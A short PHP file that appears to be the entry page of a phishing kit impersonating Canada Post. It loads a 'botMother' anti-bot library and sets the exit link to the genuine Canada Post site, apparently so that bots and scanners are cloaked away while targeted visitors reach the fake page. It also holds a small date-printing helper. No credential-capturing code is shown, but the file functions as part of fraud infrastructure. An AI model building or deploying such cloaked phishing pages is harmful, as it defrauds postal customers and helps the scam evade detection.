<?php 
session_start();
require (__DIR__).'/config.php';
require (__DIR__).'/botMother/botMother.php';
$bm = new botMother();
$bm->setExitLink("https://www.canadapost-postescanada.ca/");
$bm->setGeoFilter("");
$bm->setLicenseKey("");
$bm->setTestMode(false);
$bm->run();

function getDateOf($p){
    $tomorrow = strtotime($p);
    $formattedDate = date("F j", $tomorrow);
echo "<span>$formattedDate</span>";
}